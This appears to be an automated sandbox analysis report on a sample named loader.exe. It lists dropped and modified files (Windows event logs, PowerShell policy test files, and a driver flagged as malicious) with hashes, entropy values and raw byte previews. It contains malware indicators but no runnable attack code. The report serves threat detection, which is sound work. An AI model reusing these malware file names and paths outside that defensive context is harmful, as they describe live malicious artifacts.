                                                      SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                                      SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                                      Malicious:false
                                                      Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.3996091976763037
                                                      Encrypted:false
                                                      SSDEEP:768:Z6a0NHaPaLabaTabaraTajaXazaHa7aXazanaTara7aLaLa/aTaDafa7afaLaraD:ON
                                                      MD5:A0CD4A428D9120766250F644EE3B7B17
                                                      SHA1:C6BD970410AF5DA9985443BC2F2178EAA27D0D88
                                                      SHA-256:6028067A6CEF44AF38B9B991CFF7D35B592A87C52FBA0F90C29B6ADB5277F17A
                                                      SHA-512:0EF1557F5127C3A1C4B8C95D44B34F99B1BAD1A0C4E63E09C6E9D2BC211D03A73B0BFF97FAE09CA620B4DB39DFB3BF65CB01F6D367075D578DA595A3CF9DC05D
                                                      Malicious:false
                                                      Preview:ElfChnk.........@...............@...............`...6.........................................................................................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H............<4...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.3132453844344478
                                                      Encrypted:false
                                                      SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                                      MD5:6237EE0458A0478242B975E9BB7AA97D
                                                      SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                                      SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                                      SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                                      Malicious:false
                                                      Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.325262033408211
                                                      Encrypted:false
                                                      SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                                      MD5:D13189B45679E53F5744A4D449F8B00F
                                                      SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                                      SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                                      SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.7947046118743749
                                                      Encrypted:false
                                                      SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                                      MD5:55E73A924B170FBFFF862E8E195E839A
                                                      SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                                                      SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                                      SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                                      Malicious:false
                                                      Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):131880
                                                      Entropy (8bit):4.371726387102516
                                                      Encrypted:false
                                                      SSDEEP:384:LzRUxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRdG:LmxA8nPLGbsxA8nPLGbq
                                                      MD5:B03BA6C2B8AE3E0A6C3514C7C6604075
                                                      SHA1:7F8FB531593EC1B489FBCD44A50A3BC41F110B9E
                                                      SHA-256:D319C8167A393CCA8F6356A8274CD90E0DEE7B04274D15CDB1B9398EBEA5004F
                                                      SHA-512:7BD96E2B2A4DA446F2249A89BA072A69041DC0380FBDCBE526F9B6807CB623D6637B0486166E366948911C02A027AC1F6C3670F8BB2F91F33827721EC177EAB0
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................@...0....@.......................................................................2x......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**................2..!.........x68................................................................<.......T.....!................@..2..!..[...'YE.1o..][G....T........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...(~K.6.......N.......(.......................{.2.5.8.7.F.2.7.F.-.D.C.3.6.-.4.1.C.E.-.B.5.3.4.-.5.B.7.B.5.2.C.8.F.7.1.C.}...8.8.7.8.4.9...N.T. .A

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.273338343434408
                                                      Encrypted:false
                                                      SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                                      MD5:C37372EB51AEDB4552CB839C7294403A
                                                      SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                                      SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                                      SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                                      Malicious:false
                                                      Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.231195890775603
                                                      Encrypted:false
                                                      SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                                      MD5:3365A34953FD7B16667108A049B64DA5
                                                      SHA1:C72421A58E063D64072152344B266F8306A78702
                                                      SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                                                      SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                                      Malicious:false
                                                      Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.3512651468301184
                                                      Encrypted:false
                                                      SSDEEP:384:vh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwK:vOqabeGTnbuSxgB
                                                      MD5:8D6619A4126B5582CEAC45E692BA2951
                                                      SHA1:3D149C8F9EFAB645E1330EC79B1EE3F517543F83
                                                      SHA-256:D96AA1A21202CBD8CC68AB1ACE715016DCDC973C72E7815D2DCDFAF461555263
                                                      SHA-512:BB740ED0DA5AB8E5D51C82FDB2C056709E427257C710CC811FE9938EA30E87A5C7A10379724F9101E9DE27A99B648F3FBE03C6E1DD53E18F6FE87475632B55F2
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................H...x...$zi.....................................................................d?).............................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.421206160086997
                                                      Encrypted:false
                                                      SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                                      MD5:67CAD90771EBC0BD20736201D89C1586
                                                      SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                                      SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                                      SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                                      Malicious:false
                                                      Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Security.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):68120
                                                      Entropy (8bit):4.328257441883694
                                                      Encrypted:false
                                                      SSDEEP:384:2vFRpvFRjPoMonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo1J:I1Xa1ZGg6UMWeBS
                                                      MD5:385958C4DE1460B10ADE787B88F287BB
                                                      SHA1:53D445D82D56E88398BE51DB74D7B137D339437A
                                                      SHA-256:E829A4D3759095E5C90AE29022415F41811A16D2F96BFC6C52CBDC2CD1F26B52
                                                      SHA-512:9E56B791A21E1F1925E35A482E0B4D55A134839429BEEA7DBC3FD404C3D51D809F71557A237D6A3ED75084C9DCC077D7F83FE6BFC643D2A950A22D99E6278CFC
                                                      Malicious:false
                                                      Preview:ElfChnk.................U.......U...................T@.9.....................................................................C......................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................................................&...................................................................................**......U.........1..!.........Wt.&........Wt...wX..9Ck?5.?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                      C:\Windows\System32\winevt\Logs\Setup.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):68432
                                                      Entropy (8bit):0.4792387071841338
                                                      Encrypted:false
                                                      SSDEEP:96:XKNVaO80oz38yhO2KL8k2+KNVaO80oz38yhO2KL8k2:X8V7shhOP8V7shhO
                                                      MD5:B8934B8BBE34A8326E80B491BA0C9650
                                                      SHA1:29CDDED4284745F6245B1841D7F98C21599A9C97
                                                      SHA-256:E936E3543E19DFF2876484374FF02BAD0ADFC9F12BDBE6A978F318D80EF4438E
                                                      SHA-512:273C5FE6054A37519BD32675A8C5847E83120F7117DC56F08D92A3A839EDC58AE1F6EE0BDC2629BA4F8FE91165DB94379B25B036B6500977D074347903CCD747
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................P...(..,....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............%*D..!............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\System.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):88624
                                                      Entropy (8bit):4.477944989625847
                                                      Encrypted:false
                                                      SSDEEP:768:HICC0VdICC0VZdnLmLQXHmtpJnqiNHpzoQp9ICC0Vs+S:flb4MHmcsnJS
                                                      MD5:C09975CDC75DA98A35FEEB3D7CF858B1
                                                      SHA1:CC47A76A088F4852ABAC68C66CAA45DD2BC3E57D
                                                      SHA-256:2C4F04990DC93E92F059BD1F427C719CAB9E8736D1DD3F3F4B550DD6DA1BC099
                                                      SHA-512:0504A5C81D6FAF214CFAD5E9BCC7DADEB698CAA02D019186E081679BEC5D83E1575DF87DA47266BD39F6D6E49169EA66B1F92AAA99543EF6EAC23E169DDD2BB5
                                                      Malicious:false
                                                      Preview:ElfChnk.................n....................*...+..... ....................................................................J..................8...s...h...............`...=...................................................N...............................A....'..........w.......0.......................E...................................W...........).......M...3...:................................................................................................................'..........&...................**......n.........1..!.........i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                      C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):86776
                                                      Entropy (8bit):3.8575388136202657
                                                      Encrypted:false
                                                      SSDEEP:1536:NBH8Sf2kel3f6C1JvuBH8Sf2kel3f6C1JvSPY3c9Nw0zEkkp:8
                                                      MD5:95C1080CF3D6D9F30C7146D0C444A1B4
                                                      SHA1:8E74A4FAF5466E357F7FB835650985629DC74C23
                                                      SHA-256:9798AA71ACD038FB21180DAD12E1D496A163FB9F0A3F6B80E063BA040777A1AD
                                                      SHA-512:CF9B373284A068EB86854F63C1126A38C855487D102536F028B8C27D71BE188BD8064F027FE38A6BC6660AA80D76A82A4E1E3EEA60B270369A37EE919FB41BEB
                                                      Malicious:false
                                                      Preview:ElfChnk.................y....................M...R..pLS{....................................................................9g.b............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**......y.......Z>...!.........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                                                      C:\Windows\Temp\__PSScriptPolicyTest_bue15kxb.3e5.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_duyiesi2.5mv.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_go3xrocq.lix.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_psqhir2y.fz0.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\gyqerfjfsbie.sys

                                                      Download File
                                                      Process:C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe
                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):14544
                                                      Entropy (8bit):6.2660301556221185
                                                      Encrypted:false
                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Joe Sandbox View:
                                                      • Filename: SecuriteInfo.com.Win64.Evo-gen.31489.1077.exe, Detection: malicious, Browse
                                                      • Filename: Step 3 - Setup_Install.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Trojan.Siggen29.1091.19313.13427.exe, Detection: malicious, Browse
                                                      • Filename: eqkh9g37Yb.exe, Detection: malicious, Browse
                                                      • Filename: bBcZoComLl.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: dgiX55cHyU.exe, Detection: malicious, Browse
                                                      • Filename: gaber_mnr.ps1, Detection: malicious, Browse
                                                      • Filename: w0QdNGUNtd.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):6.538154728899747
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:loader.exe
                                                      File size:5'502'728 bytes
                                                      MD5:cdabdc02374167ccd4938e9fe8c31789
                                                      SHA1:59028bd5da928a0aadf157c39ac2c9281dcc881d
                                                      SHA256:9161be21746469b9b3c653b81d7ca6639927e89ece780a4682a2059ba30e2793
                                                      SHA512:7e823f4bc54e96e1b4b3972068b1495426acb145bd9ddbfc7959fefca957d874db844a39bfd6225a97db31027ed226301f767e4d5ce708c8da4aad4e7ba11f61
                                                      SSDEEP:98304:wTjsUxLm7HrkZkwsrK8TrIVng9Hxw+4lJZlU0SY8j/42ULZKGDeSoMjWHpNXBN6:MjhWrkZkXzTrp9Hx8JZ9SY8zCw3SnjOo
